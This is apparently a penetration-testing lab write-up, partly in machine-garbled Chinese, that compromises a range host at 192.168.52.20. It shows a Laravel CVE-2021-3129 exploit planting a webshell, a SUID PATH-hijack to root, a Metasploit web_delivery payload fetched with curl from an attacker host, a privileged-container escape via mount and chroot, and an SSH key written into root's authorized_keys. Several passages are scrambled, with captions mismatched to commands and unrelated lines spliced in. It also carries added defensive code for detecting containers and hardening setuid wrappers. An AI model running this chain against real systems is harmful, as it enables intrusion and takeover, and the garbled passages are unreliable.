- 192.168.52.255 ff-ff-ff-ff-ff-ff static
- 224.0.0.22 01-00-5e-00-00-16 static
- 224.0.0.252 01-00-5e-00-00-fc static
- Interface: 169.254.129.186 --- 0x16
- Internet Address Physical Address Type
- 169.254.255.255 ff-ff-ff-ff-ff-ff static
- 224.0.0.22 01-00-5e-00-00-16 static
- 224.0.0.252 01-00-5e-00-00-fc static
- 255.255.255.255 ff-ff-ff-ff-ff-ff static
- Interface: 192.168.93.20 --- 0x17
- Internet Address Physical Address Type
- 192.168.93.30 00-50-56-b1-03-a1 dynamic
- 192.168.93.40 00-50-56-b1-a1-a3 dynamic
- 192.168.93.255 ff-ff-ff-ff-ff-ff static
- 224.0.0.22 01-00-5e-00-00-16 static
- 224.0.0.252 01-00-5e-00-00-fc static
Found another host (192.168.93.40, in the table of the 192.168.93.20 interface):
I tried MSF's scanning modules against it and none returned any result, most likely because of a firewall, so we can shift our attention to 192.168.52.20 first.
VII. 192.168.52.20
1) CVE-2021-3129
Port 8000 on 192.168.52.20 runs an HTTP service, and the earlier scan indicated it may be vulnerable:
- [+] PocScan http://192.168.52.20:8000 poc-yaml-laravel-cve-2021-3129
A quick search shows that someone on GitHub has written an automated exploitation script:
- https://github.com/ajisai-babu/CVE-2021-3129-exp
Clone it locally:
- git clone https://github.com/ajisai-babu/CVE-2021-3129-exp.git
Run the script following the usage notes on GitHub:
- ❯ proxychains python CVE-2021-3129.py -u http://192.168.52.20:8000 --exp
- [proxychains] config file found: /etc/proxychains4.conf
- [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
- [proxychains] DLL init: proxychains-ng 4.17
- [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
- [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
- [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
- [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
- [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
- [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
- [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
- [✅]检测到漏洞![🚩]url: http://192.168.52.20:8000 [❇️info]PHP版本:7.4.14 网站路径:/var/www/html 服务器地址:172.17.0.2 系统版本:Linux 8e172820ac78 4.4.0-142-generic #168~14.04.1-Ubuntu SMP Sat Jan 19 11:26:28 UTC 2019 x86_64
- [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
- [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
- [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
- [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
- [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
- [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
- [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
- [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
- [OK] 成功写入webshell, 访问地址 http://192.168.52.20:8000/shell.php , 密码 whoami
Note: proxychains is used here so that subsequent commands go through the proxy. I will not introduce the tool itself; its usage is easy to look up online.
Connect with AntSword (any other webshell manager works too); first configure AntSword's proxy:
Remember to click Save.
Add the connection details:
Connected successfully.
2) Information gathering
www-data has low privileges, and some common reconnaissance commands are missing:
- (www-data:/var/www/html) $ ip addr
- /bin/sh: 1: ip: not found
- (www-data:/var/www/html) $ ifconfig
- /bin/sh: 1: ifconfig: not found
Still, some information can be gathered:
- (www-data:/var/www/html) $ hostname && cat /etc/issue && uname -a && cat /etc/hosts
- 8e172820ac78
- Debian GNU/Linux 10 \n \l
- Linux 8e172820ac78 4.4.0-142-generic #168~14.04.1-Ubuntu SMP Sat Jan 19 11:26:28 UTC 2019 x86_64 GNU/Linux
- 127.0.0.1 localhost
- ::1 localhost ip6-localhost ip6-loopback
- fe00::0 ip6-localnet
- ff00::0 ip6-mcastprefix
- ff02::1 ip6-allnodes
- ff02::2 ip6-allrouters
- 172.17.0.2 8e172820ac78
- (www-data:/var/www/html) $ cat /proc/version
- Linux version 4.4.0-142-generic (buildd@lcy01-amd64-006) (gcc version 4.8.4 (Ubuntu 4.8.4-2ubuntu1~14.04.4) ) #168~14.04.1-Ubuntu SMP Sat Jan 19 11:26:28 UTC 2019
- (www-data:/var/www/html) $ cat /etc/os-release
- PRETTY_NAME="Debian GNU/Linux 10 (buster)"
- NAME="Debian GNU/Linux"
- VERSION_ID="10"
- VERSION="10 (buster)"
- VERSION_CODENAME=buster
- ID=debian
- HOME_URL="https://www.debian.org/"
- SUPPORT_URL="https://www.debian.org/support"
- BUG_REPORT_URL="https://bugs.debian.org/"
From this we can tell that the host is running inside a Docker container.
Why?
Mainly because of several typical traits of Docker deployments:
- the hostname command printed 8e172820ac78, a 12-character hex string; by default Docker sets the first 12 characters of the container ID as the container's hostname, and such random short hex hostnames are rare on physical machines or ordinary VMs
- /etc/hosts explicitly maps the IP 172.17.0.2 to the hostname, and 172.17.0.0/16 is the standard subnet of Docker's default bridge network (containers are usually assigned addresses starting from 172.17.0.2)
Beyond those fingerprints, the most decisive evidence is the mismatch between kernel and OS version: /etc/os-release and /etc/issue show Debian 10 (buster), while uname -a and /proc/version show a 4.4.0-142-generic kernel built for the Ubuntu 14.04 series.
A container does not ship its own kernel; it shares the host's. In other words this is a Debian 10 container on a host running an Ubuntu-family 4.4.0-142 kernel.
Furthermore, looking at the processes:
- (www-data:/var/www/html) $ ps -p 1 -f
- UID PID PPID C STIME TTY TIME CMD
- root 1 0 0 00:38 ? 00:00:00 apache2 -DFOREGROUND
it is also obvious that this is not a normal host.
On an ordinary Linux host PID 1 is usually systemd or init; inside a container it is often sh, bash, apache2, nginx, php-fpm, python, an application start-up script, or a lightweight supervisor.
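As an added example (not from the original post), the following Python turns the four container indicators above into a reusable check that can be run over artefacts collected from any box. The sample values are constructed from the outputs shown in this write-up; PID 1 of the Ubuntu host is an assumption, since the post never shows it.

```python
"""Score container indicators from the artefacts the write-up relied on.

Added example, not from the original post. The sample values below are
constructed from the outputs shown in the write-up; PID 1 of the Ubuntu
host is an assumption (the post does not show it).
"""
import re
from ipaddress import ip_address, ip_network

DOCKER_BRIDGE = ip_network("172.17.0.0/16")
# Typical PID 1 programs inside containers, as the write-up lists them.
CONTAINER_PID1 = {"sh", "bash", "apache2", "nginx", "php-fpm", "python", "supervisord"}


def distro_id(os_release: str) -> str:
    """Extract ID= from /etc/os-release (e.g. 'debian', 'ubuntu')."""
    for line in os_release.splitlines():
        if line.startswith("ID="):
            return line[3:].strip().strip('"').lower()
    return ""


def kernel_builder(proc_version: str) -> str:
    """Guess which distro built the kernel from the /proc/version banner."""
    m = re.search(r"(ubuntu|debian)", proc_version, re.IGNORECASE)
    return m.group(1).lower() if m else ""


def container_indicators(hostname: str, etc_hosts: str, proc_version: str,
                         os_release: str, pid1_cmd: str) -> dict:
    """Return each indicator, a score and a verdict."""
    ind = {}
    # 1. Docker names the container after the first 12 hex chars of its ID.
    ind["short_hex_hostname"] = re.fullmatch(r"[0-9a-f]{12}", hostname) is not None
    # 2. /etc/hosts binds the hostname to a default-bridge address.
    ind["docker_bridge_ip"] = False
    for line in etc_hosts.splitlines():
        parts = line.split()
        if len(parts) >= 2 and hostname in parts[1:]:
            try:
                ind["docker_bridge_ip"] |= ip_address(parts[0]) in DOCKER_BRIDGE
            except ValueError:
                pass  # malformed line, ignore
    # 3. Userland says one distro, the shared host kernel says another.
    kb, did = kernel_builder(proc_version), distro_id(os_release)
    ind["kernel_userland_mismatch"] = bool(kb and did and kb != did)
    # 4. PID 1 is an application rather than a real init system.
    words = pid1_cmd.split()
    pid1 = words[0].rsplit("/", 1)[-1] if words else ""
    ind["non_init_pid1"] = pid1 in CONTAINER_PID1
    score = sum(ind.values())
    return {"indicators": ind, "score": score, "likely_container": score >= 2}


# --- samples constructed from the write-up's outputs ----------------------
LARAVEL_HOST = dict(
    hostname="8e172820ac78",
    etc_hosts="127.0.0.1 localhost\n::1 localhost ip6-localhost ip6-loopback\n"
              "172.17.0.2 8e172820ac78\n",
    proc_version="Linux version 4.4.0-142-generic (buildd@lcy01-amd64-006) "
                 "(gcc version 4.8.4 (Ubuntu 4.8.4-2ubuntu1~14.04.4) ) "
                 "#168~14.04.1-Ubuntu SMP Sat Jan 19 11:26:28 UTC 2019",
    os_release='PRETTY_NAME="Debian GNU/Linux 10 (buster)"\nNAME="Debian GNU/Linux"\n'
               'VERSION_ID="10"\nID=debian\n',
    pid1_cmd="apache2 -DFOREGROUND",
)
UBUNTU_HOST = dict(
    hostname="ubuntu",
    etc_hosts="127.0.0.1 localhost\n127.0.1.1 ubuntu\n",
    proc_version="Linux version 5.4.0-66-generic (buildd@lgw01-amd64-016) "
                 "(gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) "
                 "#74~18.04.2-Ubuntu SMP Fri Feb 5 11:17:31 UTC 2021",
    os_release='NAME="Ubuntu"\nVERSION="18.04.5 LTS (Bionic Beaver)"\nID=ubuntu\nID_LIKE=debian\n',
    pid1_cmd="/sbin/init splash",  # assumption: the write-up does not show PID 1 here
)

if __name__ == "__main__":
    print("192.168.52.20:", container_indicators(**LARAVEL_HOST))
    print("192.168.52.10:", container_indicators(**UBUNTU_HOST))
```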
3) Privilege escalation
First try escalating inside the container.
Check what sudo rights the user has:
- (www-data:/var/www/html) $ sudo -l
Output:
- We trust you have received the usual lecture from the local System
- Administrator. It usually boils down to these three things:
- #1) Respect the privacy of others.
- #2) Think before you type.
- #3) With great power comes great responsibility.
- sudo: no tty present and no askpass program specified
None.
Check for SUID files:
- (www-data:/var/www/html) $ find / -type f -perm -04000 -ls 2>/dev/null
- 25922 44 -rwsr-xr-x 1 root root 44528 Jul 27 2018 /usr/bin/chsh
- 25969 84 -rwsr-xr-x 1 root root 84016 Jul 27 2018 /usr/bin/gpasswd
- 26022 64 -rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd
- 26012 44 -rwsr-xr-x 1 root root 44440 Jul 27 2018 /usr/bin/newgrp
- 25919 56 -rwsr-xr-x 1 root root 54096 Jul 27 2018 /usr/bin/chfn
- 325013 156 -rwsr-xr-x 1 root root 157192 Jan 20 2021 /usr/bin/sudo
- 325077 20 -rwsr-xr-x 1 root root 16712 Feb 25 2021 /home/jobs/shell
- 25400 52 -rwsr-xr-x 1 root root 51280 Jan 10 2019 /bin/mount
- 25418 64 -rwsr-xr-x 1 root root 63568 Jan 10 2019 /bin/su
- 25424 36 -rwsr-xr-x 1 root root 34888 Jan 10 2019 /bin/umount
There is an obviously suspicious entry:
- 325077 20 -rwsr-xr-x 1 root root 16712 Feb 25 2021 /home/jobs/shell
Reason: a non-standard directory (jobs) under /home contains an executable called shell.
进入该目次,并检察目次下的文件:我们有来由推测,demo.c 就是 shell 编译前的容貌,检察:- (www-data:/var/www/html) $ cd /home/jobs
- (www-data:/home/jobs) $ ls
- demo.c
- shell
复制代码 实行了一个体系下令,而且是相对路径(大概存在 PATH 提权路径)。
验证 shell 是否真的和我们所判定的一样,是 demo.c 编译后的版本,运行:- (www-data:/home/jobs) $ cat demo.c
- #include<unistd.h>
- void main()
- { setuid(0);
- setgid(0);
- system("ps");
- }
复制代码 输出了历程,正如我们所料。
各人假如此处没输出可以多实行频频,这是 Webshell 固有的标题(缓存、时间限定等因素)。
查找可写目次:- (www-data:/home/jobs) $ ./shell
- PID TTY TIME CMD
- 1 ? 00:00:00 apache2
- 125 ? 00:00:00 shell
- 126 ? 00:00:00 sh
- 127 ? 00:00:00 ps
复制代码- (www-data:/home/jobs) $ (www-data:/home/jobs) $ ./shell
- PID TTY TIME CMD
- 1 ? 00:00:00 apache2
- 125 ? 00:00:00 shell
- 126 ? 00:00:00 sh
- 127 ? 00:00:00 psdev/fddev/fulldev/fusedev/mqueuedev/netdev/nulldev/ptmxdev/ptsdev/randomdev/shmdev/stderrdev/stdoutdev/ttydev/urandomdev/zerolib/systemdmsf exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.52.30/apache2msf exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.52.30/locksys/fstmpvar/cachevar/lockvar/logvar/tmpvar/www
复制代码 我选择的是 /tmp 目次,伪造 ps 步伐:- (www-data:/home/jobs) $ find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u
- dev/fd
- dev/full
- dev/fuse
- dev/mqueue
- dev/net
- dev/null
- dev/ptmx
- dev/pts
- dev/random
- dev/shm
- dev/stderr
- dev/stdout
- dev/tty
- dev/urandom
- dev/zero
- lib/systemd
- run/apache2
- run/lock
- sys/fs
- tmp
- var/cache
- var/lock
- var/log
- var/tmp
- var/www
复制代码 添加实行权限:- (www-data:/home/jobs) $ printf '#!chroot /hack\nchroot /hack -c 'whoami'\n' > /tmp/ps
复制代码 添加环境变量(留意要添加在当前环境变量的前面),而且实行 shell 步伐:- (www-data:/home/jobs) $ chmod +x /tmp/ps
复制代码 PATH 提权乐成!
由于如今是 Webshell,无法反弹 root shell 返来,上面的只是在测试是否能通过 PATH 提权。
4、Meterpreter
Webshell 中无法直接实现交互式 root shell,筹划让其上线 MSF。
先创建反向署理,这须要在跳板机上修改 ssh server 的设置文件。
登入:- (www-data:/home/jobs) $ export PATH=/tmp:$PATH && ./shell
- root
复制代码 修改文件:- ssh -i target root@192.168.111.20
复制代码 在文件中找到:将其表明取消,而且值改成 yes:重启 ssh 服务:退出登入,在 kali 中利用下述下令创建反向署理:WP 篇幅较长,克制各人忘记,这里的 target 是私钥文件。
开启 MSF:- ssh -i target -D 1080 -N -C root@192.168.111.20
复制代码 选择模块:干系设置:- exploit/multi/script/web_delivery
复制代码 实行模块:
会得到一串 linux 下令(wget 开头),但是目的上并没有 wget 下令,颠末查抄发现,curl 是可以正常利用的,这个也可以用于下载文件:- set target Linux
- set payload linux/x64/meterpreter/reverse_tcp
- set LHOST 192.168.52.10
- set SRVPORT 6666
复制代码留意找到一个能写能改权限的目次。
下载乐成后,赋予权限:- cd /tmp && curl -O http://192.168.52.10:6666/XTUK5wgCV
复制代码 然后,用我们之前找到的提权方法,以 root 权限实行该文件,如许就可以得到 root 权限的 meterpreter:- (www-data:/tmp) $ printf '#!chroot /hack\nchroot /hack -c '/tmp/XTUK5wgCV'\n' > /tmp/ps(www-data:/tmp) $ export PATH=/tmp:$PATH && (www-data:/var/www/html) $ find / -type f -perm -04000 -ls 2>/dev/null
- 25922 44 -rwsr-xr-x 1 root root 44528 Jul 27 2018 /usr/bin/chsh
- 25969 84 -rwsr-xr-x 1 root root 84016 Jul 27 2018 /usr/bin/gpasswd
- 26022 64 -rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd
- 26012 44 -rwsr-xr-x 1 root root 44440 Jul 27 2018 /usr/bin/newgrp
- 25919 56 -rwsr-xr-x 1 root root 54096 Jul 27 2018 /usr/bin/chfn
- 325013 156 -rwsr-xr-x 1 root root 157192 Jan 20 2021 /usr/bin/sudo
- 325077 20 -rwsr-xr-x 1 root root 16712 Feb 25 2021 /home/jobs/shell
- 25400 52 -rwsr-xr-x 1 root root 51280 Jan 10 2019 /bin/mount
- 25418 64 -rwsr-xr-x 1 root root 63568 Jan 10 2019 /bin/su
- 25424 36 -rwsr-xr-x 1 root root 34888 Jan 10 2019 /bin/umount
复制代码 实行乐成后,会发现 MSF 上线了一个 session(我这里是 session 2),附上去:- (www-data:/tmp) $ printf '#!chroot /hack\nchroot /hack -c '/tmp/XTUK5wgCV'\n' > /tmp/ps
- (www-data:/tmp) $ export PATH=/tmp:$PATH && /home/jobs/shell
复制代码 检察权限:
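The demo.c above is the textbook form of this bug: system("ps") inherits the caller's environment, so a setuid-root binary runs whichever ps comes first in the caller's PATH. The following is an added example, not code from the range or its author: a hardened replacement for that wrapper with an absolute-path check, a fixed environment passed to execve, and an audit of the caller's PATH for writable entries (the condition the /tmp/ps trick relies on). The function names and the SAFE_ENVP contents are my choices.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Added example, not the range's demo.c. Fixed environment for the
 * privileged child: the caller's PATH never reaches it, so "ps" can only
 * resolve inside these directories. */
static char *const SAFE_ENVP[] = { "PATH=/usr/sbin:/usr/bin:/sbin:/bin", NULL };

/* 1 if cmd is an absolute path with no empty, "." or ".." components and no
 * trailing slash: the only form a setuid wrapper should accept. */
int is_absolute_clean_path(const char *cmd)
{
    size_t n = cmd ? strlen(cmd) : 0;
    if (n < 2 || cmd[0] != '/' || cmd[n - 1] == '/')
        return 0;
    const char *p = cmd + 1;                  /* skip the leading slash */
    while (*p) {
        const char *seg = p;
        while (*p && *p != '/') p++;
        size_t len = (size_t)(p - seg);
        if (len == 0) return 0;               /* "//" inside the path */
        if (len == 1 && seg[0] == '.') return 0;
        if (len == 2 && seg[0] == '.' && seg[1] == '.') return 0;
        if (*p == '/') p++;
    }
    return 1;
}

/* 0-based index of the first PATH entry the calling user can write to, or -1
 * if none. A writable entry ahead of the system directories is exactly what
 * the /tmp/ps trick on this page relies on. */
int first_writable_path_entry(const char *path)
{
    if (path == NULL) return -1;
    const char *start = path;
    for (int index = 0;; index++) {
        const char *end = strchr(start, ':');
        size_t len = end ? (size_t)(end - start) : strlen(start);
        char dir[1024] = ".";                 /* an empty entry means the cwd */
        if (len >= sizeof dir) dir[0] = '\0'; /* oversized entry: skip it */
        else if (len > 0) { memcpy(dir, start, len); dir[len] = '\0'; }
        if (dir[0] != '\0' && access(dir, W_OK) == 0)
            return index;
        if (end == NULL) return -1;
        start = end + 1;
    }
}

/* Hardened stand-in for demo.c's system("ps"): absolute path, fixed
 * environment, no shell in between. Returns the child's exit status, or -1
 * when the path is rejected or the child cannot be created or waited for. */
int run_fixed_command(const char *abs_cmd)
{
    if (!is_absolute_clean_path(abs_cmd)) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const argv[] = { (char *)abs_cmd, NULL };
        execve(abs_cmd, argv, SAFE_ENVP);     /* returns only on failure */
        _exit(127);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* demo.c's setuid(0)/setgid(0) belong here only if root is really needed,
     * and their return values must be checked. */
    const char *path = getenv("PATH");
    int bad = first_writable_path_entry(path ? path : "");
    if (bad >= 0)
        fprintf(stderr, "warning: PATH entry %d is writable by the caller\n", bad);
    return run_fixed_command("/bin/ps") == 0 ? 0 : 1;
}
```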
5. Container escape
There is nothing useful inside the container, so try a container escape.
The easiest to exploit, and the first that comes to mind, is the "privileged container escape".
First, confirm whether the container runs in privileged mode (the precondition for the escape):

```
lsblk
fdisk -l 2>/dev/null
```

Output:

```
root@8e172820ac78:/tmp# lsblk
lsblk
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
sda 8:0 0 10G 0 disk
|-sda1 8:1 0 8G 0 part /etc/hosts
|-sda2 8:2 0 1K 0 part
`-sda5 8:5 0 2G 0 part [SWAP]
root@8e172820ac78:/tmp# fdisk -l 2>/dev/null
fdisk -l 2>/dev/null
Disk /dev/sda: 10 GiB, 10737418240 bytes, 20971520 sectors
Disk model: Virtual disk
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x00063af9
Device Boot Start End Sectors Size Id Type
/dev/sda1 * 2048 16779263 16777216 8G 83 Linux
/dev/sda2 16781310 20969471 4188162 2G 5 Extended
/dev/sda5 16781312 20969471 4188160 2G 82 Linux swap / Solaris
```

First, the host's entire physical disk is directly visible; and the MOUNTPOINT column printed by lsblk has an entry showing /etc/hosts, which is the typical sign of Docker bind-mounting the host's /etc/hosts into the container.
Create a directory on which to mount the host's real filesystem:

```
root@8e172820ac78:/tmp# mkdir /hack
mkdir: cannot create directory '/hack': File exists
```

That shows the directory already exists, so just mount:

```
mount /dev/sda1 /hack
```

After mounting, the /hack directory is the host's complete root filesystem: /hack/etc/passwd, for example, is the host's /etc/passwd.
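The lsblk/fdisk check above is read by eye. As an added example, not a tool from the page or the range, the routine below reads the same signals from captured text: fdisk -l printing a "Disk /dev/..." line, which means the device node existed and could be opened, and CapEff in /proc/self/status being a full capability mask, which is what --privileged grants. The function and sample names are mine; the samples are constructed from the output captured on this page plus Docker's default capability set.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not a tool from the page. What the two commands used on
 * this page reveal from inside a container. */
struct container_audit {
    int host_disk_openable;  /* fdisk printed "Disk /dev/...": node exists and opened */
    char disk[64];           /* that device path, e.g. "/dev/sda" */
    int full_capabilities;   /* CapEff is a full mask, as under --privileged */
};

/* Parse captured `fdisk -l` output and the text of /proc/self/status. */
struct container_audit audit_container(const char *fdisk_out, const char *proc_status)
{
    struct container_audit r;
    memset(&r, 0, sizeof r);

    /* fdisk only reports a disk whose device node it could open. lsblk on its
     * own is weaker evidence: it reads sysfs, which an ordinary container can
     * read too, whereas without the node fdisk -l prints nothing. */
    const char *line = fdisk_out;
    while (line != NULL && *line != '\0') {
        const char *eol = strchr(line, '\n');
        size_t len = eol ? (size_t)(eol - line) : strlen(line);
        if (!r.host_disk_openable && len > 10 && strncmp(line, "Disk /dev/", 10) == 0) {
            const char *dev = line + 5;                 /* skip "Disk " */
            size_t n = 0;
            while (n < len - 5 && dev[n] != ':' && n < sizeof r.disk - 1) n++;
            memcpy(r.disk, dev, n);
            r.disk[n] = '\0';
            r.host_disk_openable = 1;
        }
        line = eol ? eol + 1 : NULL;
    }

    /* CapEff of a --privileged container is 2^k - 1 for the kernel's k
     * capabilities (0000003fffffffff on the page's 5.4 kernel). Docker's
     * default set, 00000000a80425fb, has holes, so (x & (x + 1)) != 0. */
    const char *cap = strstr(proc_status, "CapEff:");
    unsigned long long eff = 0;
    if (cap != NULL && sscanf(cap, "CapEff: %llx", &eff) == 1 && eff != 0)
        r.full_capabilities = ((eff & (eff + 1)) == 0);
    return r;
}

/* Constructed samples: the fdisk lines are the ones captured on this page;
 * the status lines mimic /proc/self/status in that container and in an
 * ordinary one. */
static const char FDISK_PRIVILEGED[] =
    "Disk /dev/sda: 10 GiB, 10737418240 bytes, 20971520 sectors\n"
    "Disk model: Virtual disk\n"
    "Disklabel type: dos\n"
    "Device Boot Start End Sectors Size Id Type\n"
    "/dev/sda1 * 2048 16779263 16777216 8G 83 Linux\n";
static const char STATUS_PRIVILEGED[] =
    "Name:\tbash\nCapPrm:\t0000003fffffffff\nCapEff:\t0000003fffffffff\n";
static const char FDISK_DEFAULT[] = "";   /* no device nodes: fdisk -l prints nothing */
static const char STATUS_DEFAULT[] =
    "Name:\tbash\nCapPrm:\t00000000a80425fb\nCapEff:\t00000000a80425fb\n";

int main(void)
{
    struct container_audit a = audit_container(FDISK_PRIVILEGED, STATUS_PRIVILEGED);
    printf("disk openable: %d (%s), full capabilities: %d\n",
           a.host_disk_openable, a.disk, a.full_capabilities);
    return (a.host_disk_openable || a.full_capabilities) ? 1 : 0;
}
```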
But translating paths like that is cumbersome and error-prone, so use chroot to change the root directory; after that, / becomes /hack.
Switch to the host shell and verify that the switch succeeded. The escape worked, but so far only at the filesystem level; on the network side we are still inside the container, which ip addr shows at once.

6. Getting root on the host
The earlier scan showed that the host has port 22 open, so we use the same trick again: write in an ssh public key, then connect to the target directly with ssh, which gives a complete root on the host.
Find the public key generated earlier and print its contents:

```
❯ cat target.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDYrIRFtsijwuU43JeBFUwC04tSP3jNnl3ujMwgOO7FIOaDe0c7Wsp+qk/vpSKfhnTfyPAmHrO5q58zbDuFCzBrQrUNxUXVXJaO6k8csJ2VuPBh5YN7W61q9Cs62BacSX9QHDv+EhCkewVW2O3oGWbvWODnQh8tbwV815HyP15hlIXrisEp9DHWqhvz2scKYcVPw38g31yUJkcMU4T83yMziBSIKgDi/6+RB7JsJXZ+x72QAQtFes6JHYDl1Z3NQmPCdesww/Bx0hwXOx3d9LJAtpV9WIPMVbK05bMlwdDs321yX060WZOJwrQBgG2gqLNANjjouOIJlyrHLNRt5QfACNkFWNehWtckYLtV1/03cF02medJ/IJMt1yokLo/O2hcG0NK8vOxbUbcBrXUfHxHUWSUYwyag7L0SYctycjCi7lIXze8UhTf7C8oT7fPPzRiuoEu6KRuxXCxEJEOBa928iD/OhLu0JlVf+W2NrAnw3zJZJjh9ckHhATu+oFagg0= zyf@kali
```

The host has neither the directory nor the file, so create the directory first, then write the key:

```
cat > /root/.ssh/authorized_keys << 'EOF'
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDYrIRFtsijwuU43JeBFUwC04tSP3jNnl3ujMwgOO7FIOaDe0c7Wsp+qk/vpSKfhnTfyPAmHrO5q58zbDuFCzBrQrUNxUXVXJaO6k8csJ2VuPBh5YN7W61q9Cs62BacSX9QHDv+EhCkewVW2O3oGWbvWODnQh8tbwV815HyP15hlIXrisEp9DHWqhvz2scKYcVPw38g31yUJkcMU4T83yMziBSIKgDi/6+RB7JsJXZ+x72QAQtFes6JHYDl1Z3NQmPCdesww/Bx0hwXOx3d9LJAtpV9WIPMVbK05bMlwdDs321yX060WZOJwrQBgG2gqLNANjjouOIJlyrHLNRt5QfACNkFWNehWtckYLtV1/03cF02medJ/IJMt1yokLo/O2hcG0NK8vOxbUbcBrXUfHxHUWSUYwyag7L0SYctycjCi7lIXze8UhTf7C8oT7fPPzRiuoEu6KRuxXCxEJEOBa928iD/OhLu0JlVf+W2NrAnw3zJZJjh9ckHhATu+oFagg0= zyf@kali
EOF
```

Log in to the host through the proxy with the private key; when the login does not go through, rerunning it with -vvv shows the cause:

```
proxychains ssh -i target root@192.168.52.20
proxychains ssh -i target root@192.168.52.20 -vvv
```

```
debug1: send_pubkey_test: no mutual signature algorithm
```

Once on the host, look at its network and firewall configuration:

```
root@ubuntu:~# ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:b1:7e:66 brd ff:ff:ff: ff:ff:ff
inet 192.168.52.20/24 brd 192.168.52.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::250:56ff:feb1:7e66/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:b1:4a:b8 brd ff:ff:ff:ff:ff:ff
inet 192.168.93.10/24 brd 192.168.93.255 scope global eth1
valid_lft forever preferred_lft forever
inet6 fe80::250:56ff:feb1:4ab8/64 scope link
valid_lft forever preferred_lft forever
4: br-1d665e13ee58: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:a8:01:1e:34 brd ff:ff:ff:ff:ff:ff
inet 172.20.0.1/16 brd 172.20.255.255 scope global br-1d665e13ee58
valid_lft forever preferred_lft forever
5: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:29:fc:b3:bf brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
inet6 fe80::42:29ff:fefc:b3bf/64 scope link
valid_lft forever preferred_lft forever
6: br-f0d07941b332: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:08:d3:ed:3c brd ff:ff:ff:ff:ff:ff
inet 172.19.0.1/16 brd 172.19.255.255 scope global br-f0d07941b332
valid_lft forever preferred_lft forever
7: br-05384b1b0df2: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:77:1a:64:7a brd ff:ff:ff:ff:ff:ff
inet 172.18.0.1/16 brd 172.18.255.255 scope global br-05384b1b0df2
valid_lft forever preferred_lft forever
9: vetha18b54f@if8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default
link/ether ba:51:d0:c7:b2:be brd ff:ff:ff:ff:ff:ff
inet6 fe80::b851:d0ff:fec7:b2be/64 scope link
valid_lft forever preferred_lft forever
```

```
root@ubuntu:~# ip route show
default via 192.168.52.2 dev eth0
169.254.0.0/16 dev eth1 scope link metric 1000
172.17.0.0/16 dev docker0 proto kernel scope link src 172.17.0.1
172.18.0.0/16 dev br-05384b1b0df2 proto kernel scope link src 172.18.0.1
172.19.0.0/16 dev br-f0d07941b332 proto kernel scope link src 172.19.0.1
172.20.0.0/16 dev br-1d665e13ee58 proto kernel scope link src 172.20.0.1
192.168.52.0/24 dev eth0 proto kernel scope link src 192.168.52.20
192.168.93.0/24 dev eth1 proto kernel scope link src 192.168.93.10
```

```
root@ubuntu:~# iptables -L -v -n 2>/dev/null
Chain INPUT (policy ACCEPT 2829 packets, 279K bytes)
pkts bytes target prot opt in out source destination
